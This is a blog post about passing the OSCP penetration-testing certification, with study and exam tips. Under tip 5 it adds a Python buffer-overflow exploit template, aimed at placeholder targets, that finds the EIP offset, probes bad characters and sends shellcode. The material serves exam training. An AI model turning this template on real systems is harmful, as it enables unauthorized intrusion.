Whether you're about to embark on the OSCP journey, already started the PWK course, or waiting those nervous days before the exam, you’ve come to the right place. This post outlines my experiences passing the OSCP and aims to provide some tips that helped me along the way!
I have been a full-time penetration tester for several years now, performing a variety of assessments against customer environments. I knew going into the OSCP that web applications were not my strong suit (in comparison). Therefore, I decided to take the first few months of 2020 and complete eLearnSecurity's eWPT certification. Feeling a bit more prepared, and with the confidence of a new cert under my belt, I was ready to tackle the OSCP!
PWK Course / Labs
1) Don't Forget About the PDF Guide & Course Videos
After receiving my PWK materials and lab access, I took the first few weeks to comb through the PDF guide. I started each night with one or two sections from the PDF, then finished with some time in the lab. I purchased 90 days of lab access, knowing there would be some obstacles in my personal life that would have kept me from getting as much lab time as I wanted with one of the shorter options.
Although I did not submit a lab report, I did work through the exercises and documented my answers to each section. This ended up being very useful and was referenced several times while working on some of the lab machines.
2) Root as Many Lab Systems as You Can
It's no surprise that the exam machines will somewhat resemble the techniques learned in the lab. It's in your best interest to get as much exposure as possible. If there's something you struggle with (e.g. web apps, priv esc), try to choose machines that highlight those techniques and PRACTICE! In total, I rooted 21 systems and got access to all additional network segments. Many people set goals, such as 20, 30, 40 or 50 systems. If you have the time and dedication, that is an excellent way to stay motivated and get the most out of the course!
Don't forget to save and document your actions, even if not submitting a lab report. You never know when you'll have to recall a technique or payload.
3) Don't Be Afraid to Ask for Help
Don't be afraid to ask for help in the Offensive Security forums or community resources. If someone helps you, pay it forward. Everyone is there for the same reason, to learn and get better!
This was a lesson I wish someone had told me early on. In my experience, everyone was very friendly and more than willing to help. Just be respectful of people's time and don't expect all the answers. When asking for help, detail the steps you have already taken and ask specific questions so people can provide a nudge.
4) Set Your Exam Date Early & Choose a Time That's Right for You
With about 30 days of lab access left, I scheduled my exam. I opted to take it a week after my lab ended to ensure everything I learned was still fresh. During that week, I read multiple reviews and blog posts, studied the PDF guide, and watched the provided video trainings. Another small task that helped immensely was collecting additional tools and resources for situations I might encounter, and organizing my browser bookmarks to streamline research during the exam.
Knowing I'm a morning person, I was sure to schedule a morning start time - factoring in potential meals, naps, and other breaks throughout the day. I ended up taking shorter breaks than expected, only getting 1 hour of sleep in 24 hours, but having an idea of this going into it helped me stay relatively calm.
5) Go in With a Plan
From the second I got my exam connection packet, I was prepared. The buffer overflow system was my first target, which I exploited while running Tib3rius's AutoRecon in the background against the rest of the scope. The exploit development section took me about 2 hours using a template I had created on the last day of my lab access. I found my prep work allowed me to hit the ground running and not waste any time, time I might well have needed later on.
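As an added illustration of what such a template looks like (this is example code written for this page, not the author's own template), the script below covers the four stages of a classic PWK-style stack overflow against a TCP service: a cyclic pattern to locate the EIP offset, a bad-character probe, and payload assembly around a return address and shellcode. The target address, port and command prefix are placeholders, and the sample EIP value in the usage section is constructed, not taken from any real crash.

```python
#!/usr/bin/env python3
"""Stack buffer-overflow exploit template (added example, not the post author's).

Assumptions (not from the original post): a vulnerable TCP service that copies
one line into a fixed-size stack buffer on 32-bit x86, so EIP is overwritten
with 4 little-endian bytes from the input. TARGET and PREFIX are placeholders.
"""
import socket
import string
import struct

TARGET = ("192.0.2.10", 9999)   # placeholder (TEST-NET-1 address, not a real host)
PREFIX = b"OVERFLOW "           # placeholder command prefix accepted by the service


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...), unique in every 4-byte window
    up to 20280 bytes, so the value found in EIP maps to exactly one offset."""
    out = bytearray()
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                if len(out) >= length:
                    return bytes(out[:length])
                out += (a + b + c).encode()
    return bytes(out[:length])


def pattern_offset(eip_value: int, length: int = 20000) -> int:
    """Offset of the bytes that landed in EIP, given EIP as read from the debugger
    (little-endian x86 register value). Returns -1 if the value is not in the pattern."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def badchars(exclude=(0x00,)) -> bytes:
    """Every byte value except those already known to be bad; send this after the
    EIP offset, compare the stack dump against it, and repeat with the new exclusions."""
    return bytes(b for b in range(256) if b not in exclude)


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  nop_sled: int = 16, total: int = 2000) -> bytes:
    """Junk up to EIP, EIP overwritten with e.g. a JMP ESP address, a NOP sled,
    then the shellcode, padded to a fixed total so the crash stays consistent."""
    payload = (b"A" * offset
               + struct.pack("<I", ret_addr)
               + b"\x90" * nop_sled
               + shellcode)
    if len(payload) > total:
        raise ValueError("payload exceeds the buffer length used during fuzzing")
    return payload + b"C" * (total - len(payload))


def send_payload(data: bytes, target=TARGET, timeout: float = 5.0) -> None:
    """Deliver one stage to the service; the same framing is used for every stage."""
    with socket.create_connection(target, timeout=timeout) as s:
        s.sendall(PREFIX + data + b"\r\n")


if __name__ == "__main__":
    # Stage 1: after fuzzing finds the crash length, send a cyclic pattern:
    #   send_payload(pattern_create(2000))
    # Stage 2: read EIP in the debugger. 0x41316141 is a constructed sample value.
    offset = pattern_offset(0x41316141)
    print("EIP offset:", offset)
    # Stage 3: confirm control and probe for bad characters:
    #   send_payload(b"A" * offset + b"BBBB" + badchars((0x00,)))
    # Stage 4: swap in the JMP ESP address and msfvenom shellcode (placeholders here):
    payload = build_payload(offset, 0x625011AF, b"\xcc" * 4)
    print("payload length:", len(payload))
    #   send_payload(payload)
```

Keep the total length fixed across stages: the offset only holds for the input size that produced the crash, and that is where most "my offset was wrong on exam day" stories come from.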
6) Be Smart, Do Math
Before the exam, I read so many unfortunate posts about smart people falling just short of the 70 points required to pass. Not wanting to end up in the same position, I tried to exploit the exam systems in a way that would give me the most points possible. It felt like I had a calculator running in my head at all times, playing out different scenarios to help determine which system to target next. I started with the higher-point systems and only moved to the lower-point ones where it made sense.
7) Stuck? Come Back to It
If you're anything like me, this piece of advice is easier said than done. I wanted to systematically run through each host in the order I had mapped out, knocking them out until I passed. This sounds great in theory, but it isn't always possible. Several times I found myself stuck, spending far too much time on one machine. Instead of looking at the clock and having a mini panic attack, I moved on to the next system in line. Only after I was done, or at an acceptable number of points, did I come back and try again.
There is a reason the OSCP is considered a standard for most jobs in the offensive security space. Although difficult, it is achievable. Just breathe, keep learning, and don't give up - or as they say "Try harder"!
- Privilege Escalation: